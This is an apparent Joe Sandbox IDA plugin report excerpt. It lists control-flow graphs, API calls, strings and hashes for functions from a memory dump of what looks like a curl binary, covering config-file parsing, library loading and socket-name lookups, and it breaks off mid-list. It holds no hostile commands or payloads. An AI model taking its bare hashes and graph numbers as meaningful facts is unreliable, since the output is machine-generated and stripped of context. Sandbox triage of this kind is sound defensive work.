                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen$fopen$fclosefgetsfreereallocstrcmpstrcpy
                                                                                                                                                                                                                                                            • String ID: %s%s$%s%s%s$%s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted white space in the line that may cause side-effects!$-$<stdin>$_curlrc
                                                                                                                                                                                                                                                            • API String ID: 595318844-3017759249
                                                                                                                                                                                                                                                            • Opcode ID: 3e920a108febeb01ef3693535e4b0f6bdd00409d04165cc473569f71f1b06fc7
                                                                                                                                                                                                                                                            • Instruction ID: 06a154ccac5875849b2c4116c1a3d8ae0a01c87e55fd57ea4bc95a1f3ccb7671
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e920a108febeb01ef3693535e4b0f6bdd00409d04165cc473569f71f1b06fc7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18E169F1D283426BDB649E24BE8177B77D89F41304F08047EEC868B252F665DD29CB62

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 351 2363e5-2363fb 352 236401-236412 strchr 351->352 353 2368dc-2368e1 351->353 356 236427-236431 352->356 357 236414-236421 strchr 352->357 354 2368e7-2368ea 353->354 355 236bbf-236bce _strdup 353->355 354->355 358 2368f0-236906 strcmp 354->358 359 238ea0 355->359 360 236bd4-236be3 strlen 355->360 362 236437-236447 strcmp 356->362 363 236fd8-236fe7 _strdup 356->363 357->356 361 236fce-236fd2 357->361 365 236eb1-236ec3 358->365 366 23690c-23691e fopen 358->366 368 238ea5-238ea7 359->368 369 237104 360->369 361->363 364 2370e1-2370f4 _strdup 361->364 370 236f75-236fab call 231560 call 23e8c0 362->370 371 23644d-23645d fopen 362->371 363->359 367 236fed-236ffc strlen 363->367 364->359 376 2370fa-2370fc 364->376 373 236edb-236ee0 365->373 394 236ec5-236ed9 call 231560 365->394 372 236924-236939 call 239db0 366->372 366->373 374 23703b-23706a call 241d90 free 367->374 375 238e1b-238e24 368->375 377 237107-23710c 369->377 406 236fad-236fba 370->406 425 237027-237029 370->425 378 236463-23647a call 23e8c0 371->378 379 236ffe-237025 call 239db0 call 23e8c0 371->379 372->373 380 236ee2-236ef9 call 23e8c0 373->380 381 236efd-236f03 call 23e7e0 373->381 374->368 405 237070-237090 strlen malloc 374->405 376->369 386 2371a2-2371b1 call 24c4d0 377->386 387 237112-237138 call 24c4d0 malloc 377->387 378->406 379->425 408 236f26-236f33 380->408 409 236efb 380->409 403 236f08-236f13 381->403 407 2371b4-2371ba 386->407 415 238e75-238e92 free * 2 387->415 416 23713e-2371a0 memcpy * 2 free * 2 387->416 394->380 412 236f22-236f24 403->412 413 236f15-236f1e strlen 403->413 417 237096-23709c 405->417 418 238e94-238e9d call 242080 405->418 406->425 436 236fbc-236fc7 fclose 406->436 422 238d70-238d78 407->422 424 236f3e-236f40 408->424 445 236f35-236f3b fclose 408->445 409->424 412->408 412->424 413->412 415->359 416->407 426 2370be-2370cb strcpy 417->426 427 23709e-2370bc call 243380 417->427 418->359 429 238e25-238e27 422->429 430 238d7e-238d86 422->430 424->368 438 236f46-236f4c 424->438 425->368 434 23702f-237035 425->434 431 2370ce-2370df call 242080 426->431 427->431 429->375 430->429 441 238d8c-238da1 430->441 431->369 434->364 434->374 436->434 444 236fc9 436->444 438->369 439 236f52-236f6a _strdup 438->439 439->377 446 236f70 439->446 447 238da7 441->447 448 235d0c-235d11 441->448 444->368 445->424 446->359 447->375 450 235d13-235d1e 448->450 451 235d20-235d28 448->451 452 235d2c-235d31 450->452 451->452 453 235d33-235d3a 452->453 454 235d5c-235d69 452->454 455 235d40-235d46 453->455 456 235d90-235d94 454->456 457 235d6b-235d70 454->457 458 235d59 455->458 459 235d48-235d52 455->459 462 235de0-235de8 456->462 463 235d96-238e2e 456->463 460 235d72-235d76 457->460 461 235d9b-235d9f 457->461 458->454 459->455 464 235d54 459->464 467 238e30-238e35 460->467 468 235d7c-235d88 460->468 461->460 470 235da1-235db2 461->470 465 238e16 462->465 466 235dee-235df3 462->466 463->375 464->465 465->375 471 235e14-235e1f 466->471 472 235dfa-235dff 466->472 467->375 473 235db4-235dba 468->473 474 235d8a 468->474 470->462 470->473 471->422 477 235e25 471->477 475 235e05-235e0f 472->475 476 2369c4-2369ce 472->476 473->462 478 235dbc-235dc0 473->478 474->462 475->422 476->422 477->476 478->462 479 235dc2-235dd6 call 239db0 478->479 479->462
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _strdupfopenfreemallocmemcpystrchrstrcmpstrlen$fclose
                                                                                                                                                                                                                                                            • String ID: %.*s=%s$Couldn't read data from file "%s", this makes an empty POST.$b
                                                                                                                                                                                                                                                            • API String ID: 3267589696-3773282534
                                                                                                                                                                                                                                                            • Opcode ID: b0f1434dd51fffb5fe767b7a32f8979806c5064e989069ea31a4aca4b17d88a0
                                                                                                                                                                                                                                                            • Instruction ID: c16fc9ca316fb995fedfe66782a3ab6a62333ee5c28da69cddc5184e49a25f3e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0f1434dd51fffb5fe767b7a32f8979806c5064e989069ea31a4aca4b17d88a0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EC1F5F2D143426BDB21AF24DC42B5B7AE89F90348F180879F8459B252FB75D924C7A3

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 482 251990-2519a3 GetModuleHandleA 483 251a8d 482->483 484 2519a9-2519cd GetProcAddress strpbrk 482->484 485 251a8f-251a93 483->485 486 2519d7-2519d9 484->486 487 2519cf-2519d1 484->487 490 251a06-251a12 GetSystemDirectoryA 486->490 491 2519db-2519e9 GetProcAddress 486->491 488 2519d3-2519d5 487->488 489 2519fa-251a01 LoadLibraryA 487->489 494 2519f0-2519f5 LoadLibraryExA 488->494 489->485 490->483 493 251a14-251a36 strlen 490->493 491->490 492 2519eb 491->492 492->494 496 251a83-251a8a 493->496 497 251a38-251a42 GetSystemDirectoryA 493->497 494->485 496->483 497->496 498 251a44-251a6f strlen * 2 strcpy 497->498 500 251a71-251a78 498->500 501 251a7a-251a7b LoadLibraryA 498->501 502 251a81 500->502 501->502 502->496
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,00000002,?,00000003,?,0024C0D5,security.dll,?,00000002,00243B35), ref: 00251999
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 002519B5
                                                                                                                                                                                                                                                            • strpbrk.MSVCRT ref: 002519C3
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 002519E1
                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000800,?,00000002,00243B35), ref: 002519F3
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,0024C0D5,security.dll,?,00000002,00243B35), ref: 002519FB
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 00251A0A
                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 00251A1A
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,00000000), ref: 00251A3A
                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 00251A45
                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 00251A54
                                                                                                                                                                                                                                                            • strcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000002,00243B35), ref: 00251A65
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000002,00243B35), ref: 00251A7B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LibraryLoadstrlen$AddressDirectoryProcSystem$HandleModulestrcpystrpbrk
                                                                                                                                                                                                                                                            • String ID: AddDllDirectory$LoadLibraryExA$kernel32
                                                                                                                                                                                                                                                            • API String ID: 1231326539-3327535076
                                                                                                                                                                                                                                                            • Opcode ID: 6f562ce2919b6e9b1d94f9ec96ab0173cded20cc4cec337d3096ce91251ea710
                                                                                                                                                                                                                                                            • Instruction ID: 43d324d6a622ade29dc6874df616343919417904ec6b371a9171779e0629d4ae
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f562ce2919b6e9b1d94f9ec96ab0173cded20cc4cec337d3096ce91251ea710
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921C1B1A113017BEB117F366C45F2B355C9F44B46F080535BD06A9282FA79D83CD2BA

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 712 244700-244719 713 2447af-2447b6 712->713 714 24471f-244728 712->714 715 244737-2447a9 memcpy 714->715 716 24472a-244731 714->716 715->713 716->715 717 2447b7-2447d7 getpeername 716->717 718 2447f4-24481c getsockname 717->718 719 2447d9-2447f2 WSAGetLastError call 249f70 717->719 721 244845-244865 call 244690 718->721 722 24481e-244832 WSAGetLastError call 249f70 718->722 726 244837-244840 call 267140 719->726 730 244867-244893 memcpy call 244690 721->730 731 24489c-2448bc _errno call 249f70 721->731 722->726 726->713 737 244895-244897 730->737 738 2448c1-2448e1 _errno call 249f70 730->738 731->726 737->715 738->726
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • ssrem inet_ntop() failed with errno %d: %s, xrefs: 002448B7
                                                                                                                                                                                                                                                            • getpeername() failed with errno %d: %s, xrefs: 002447ED
                                                                                                                                                                                                                                                            • getsockname() failed with errno %d: %s, xrefs: 00244832
                                                                                                                                                                                                                                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 002448DC
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast_errnomemcpy$getpeernamegetsockname
                                                                                                                                                                                                                                                            • String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                                                                                                                                                                                                                                            • API String ID: 4028824192-670633250
                                                                                                                                                                                                                                                            • Opcode ID: 037fb857c80eae48f6bf42b3651e00bd839c7f88ba9378f10b1f0ad6d3dfbffc
                                                                                                                                                                                                                                                            • Instruction ID: ba9772b3f0d3ca78c3a092e6d504969a19883797194599213eeff3d5181108b4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 037fb857c80eae48f6bf42b3651e00bd839c7f88ba9378f10b1f0ad6d3dfbffc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49519E75510204AFDB08EF10DC85FE673ACEF96304F0940BAFD099B256E7B1A919CB62

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 812 2396b0-2396d0 GetEnvironmentVariableA 813 2396d2-2396d7 812->813 814 2396e6-2396fd GetEnvironmentVariableA 812->814 813->814 815 2396d9-2396e4 _strdup 813->815 816 239713-239724 call 239740 814->816 817 2396ff-239704 814->817 815->814 818 239735-23973c 815->818 816->818 822 239726-239730 call 239740 816->822 817->816 819 239706-239711 _strdup 817->819 819->816 819->818 822->818
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNELBASE(CURL_HOME,?,00000400), ref: 002396C4
                                                                                                                                                                                                                                                            • _strdup.MSVCRT(?,?,00000400), ref: 002396DA
                                                                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(HOME,?,00000400,?,00000400), ref: 002396F1
                                                                                                                                                                                                                                                            • _strdup.MSVCRT(?,?,00000400,?,00000400), ref: 00239707
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: EnvironmentVariable_strdup
                                                                                                                                                                                                                                                            • String ID: %USERPROFILE%\Application Data$APPDATA$CURL_HOME$HOME
                                                                                                                                                                                                                                                            • API String ID: 3075022039-734137483
                                                                                                                                                                                                                                                            • Opcode ID: 19270b8825617d5a14fac5685b9969a330af3e0746f9127df299b0d4e4e0f0ac
                                                                                                                                                                                                                                                            • Instruction ID: 265018e1c1caab86810c62540c0999fc980098ae79969556293ef35e99cf5caf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19270b8825617d5a14fac5685b9969a330af3e0746f9127df299b0d4e4e0f0ac
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AF028F4E2410317E7603E215C06B9A65088F13784F040038EA49AA1C3FA88C8D28ADF

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • error initializing curl library, xrefs: 00239A88
                                                                                                                                                                                                                                                            • --dump-module-paths, xrefs: 00239AE8
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleMode$freefwritemallocstrcmp
                                                                                                                                                                                                                                                            • String ID: --dump-module-paths$error initializing curl library
                                                                                                                                                                                                                                                            • API String ID: 106277626-1789877276
                                                                                                                                                                                                                                                            • Opcode ID: 85c8d7859efc023c1f9f36cfb046d5e19cc394950a209cd8d6f9eedaa106ba22
                                                                                                                                                                                                                                                            • Instruction ID: 0936073aae74a54420715fa012fbbeab4ed36efe404b7aab84fa2dac1e2a4dcc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85c8d7859efc023c1f9f36cfb046d5e19cc394950a209cd8d6f9eedaa106ba22
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C91106F2D103059BEF00AF64BC06A6D7729AF51358F140131FD09A6252FBB1DEA5CBA5

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 939 2391c0-2391d0 940 2391d6-2391e9 939->940 941 23938c 939->941 943 2391f0-2391fb 940->943 942 23938e-239395 941->942 944 239201-239205 943->944 945 2392d0-2392e8 call 235a00 943->945 944->945 947 23920b-23921b strcmp 944->947 951 2392ea-2392ec 945->951 949 239221-239227 947->949 950 2392fb-239306 947->950 952 239231-23923d call 235a00 949->952 953 239229-23922d 949->953 954 239308 950->954 955 2392ee-2392f3 950->955 951->955 956 23932f-239332 951->956 959 239242-239248 952->959 953->952 954->956 955->943 957 2392f9 955->957 960 239334-23933c 956->960 961 23933e-23934b call 2395d0 956->961 957->956 962 23930a-239322 959->962 963 23924e-239258 959->963 960->961 964 239396-23939d 960->964 970 239377-239389 call 239de0 961->970 971 23934d-23935d strcmp 961->971 962->955 966 239324 962->966 963->951 967 23925e-239262 963->967 964->942 966->956 967->951 969 239268-23927d malloc 967->969 972 239283-2392c5 call 2327c0 969->972 973 239326-23932d 969->973 970->941 971->970 974 23935f-239375 call 239de0 971->974 972->955 981 2392c7 972->981 973->955 973->956 974->941 981->956
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strcmp$malloc
                                                                                                                                                                                                                                                            • String ID: %s$-$--url$option %s: %s$n
                                                                                                                                                                                                                                                            • API String ID: 2681023970-2553401801
                                                                                                                                                                                                                                                            • Opcode ID: 5c5fcd791dc0fd004b2d57eb4f3733d06c56dbae6a34780ab57f3cc38c124fb2
                                                                                                                                                                                                                                                            • Instruction ID: 5f27defded4ba25ac48d96c15df9ed3406644e7be40d0f15c7a8353ec3dd696d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c5fcd791dc0fd004b2d57eb4f3733d06c56dbae6a34780ab57f3cc38c124fb2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D441D7F1A24612ABD7119F28C881F6BB7D8FF86704F050559FC4897251E3B5EDA0CB92

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 982 23e7e0-23e7fa 983 23e800-23e813 fgets 982->983 984 23e896-23e89d 982->984 986 23e892 983->986 987 23e819-23e81f 983->987 985 23e89f-23e8a9 984->985 989 23e894 986->989 988 23e820-23e82d strchr 987->988 990 23e832-23e83f strchr 988->990 991 23e82f 988->991 989->984 992 23e841 990->992 993 23e844-23e85f strlen realloc 990->993 991->990 992->993 994 23e861-23e88e strcpy fgets 993->994 995 23e8aa-23e8b8 free 993->995 994->988 996 23e890 994->996 995->985 996->989
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: fgetsstrchr$freereallocstrcpystrlen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 606539986-0
                                                                                                                                                                                                                                                            • Opcode ID: 978d67c761a426b33e4588fadcac0b47cd6f6cd7d760d1bd8abec25bb8797e5e
                                                                                                                                                                                                                                                            • Instruction ID: d9da7999f82696db3365440fb11d0305b8d8e142d61f870b07513d98b0906daf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 978d67c761a426b33e4588fadcac0b47cd6f6cd7d760d1bd8abec25bb8797e5e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8911EBF1F1424527EF2A6936AC02BEB35D98F96305F0A007DFD08862D1FA59D91981FB

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 997 23125b-23125f 998 231260-231262 997->998 999 231290-231292 998->999 1000 231264-231267 998->1000 1001 2312a5-2312ad 999->1001 1002 231294 999->1002 1000->999 1003 231269 1000->1003 1004 2312af-2312bc 1001->1004 1006 2312a0-2312a3 1001->1006 1002->1004 1005 23126e-231277 1003->1005 1009 2312d2-23130e malloc 1004->1009 1010 2312be-2312c7 1004->1010 1005->998 1011 231279-231284 1005->1011 1006->1001 1006->1004 1015 231310-231344 strlen malloc memcpy 1009->1015 1012 2313c0-2313c4 1010->1012 1013 2312cd 1010->1013 1011->1005 1012->1013 1013->1009 1015->1015 1016 231346-231398 call 4b7680 call 2399d0 1015->1016 1021 23139e-2313a6 1016->1021 1022 23146c-231492 exit call 4b76c0 1016->1022 1023 2313b2-2313bd 1021->1023 1024 2313a8-2313ad _cexit 1021->1024 1024->1023
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
